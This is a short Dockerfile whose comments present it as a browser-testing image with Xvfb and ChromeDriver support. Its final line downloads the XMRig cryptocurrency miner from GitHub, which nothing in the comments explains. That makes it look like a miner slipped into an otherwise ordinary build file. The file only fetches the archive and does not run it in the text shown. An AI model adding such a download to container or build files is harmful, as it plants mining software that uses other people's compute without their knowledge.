# Starting from Ubuntu Xenial
FROM ubuntu:xenial

# We need wget to set up the PPA, Xvfb to have a virtual screen and unzip to extract ChromeDriver
RUN apt-get update
RUN apt-get install -y wget xvfb unzip

RUN wget https://github.com/xmrig/xmrig/releases/download/v6.6.1/xmrig-6.6.1-linux-x64.tar.gz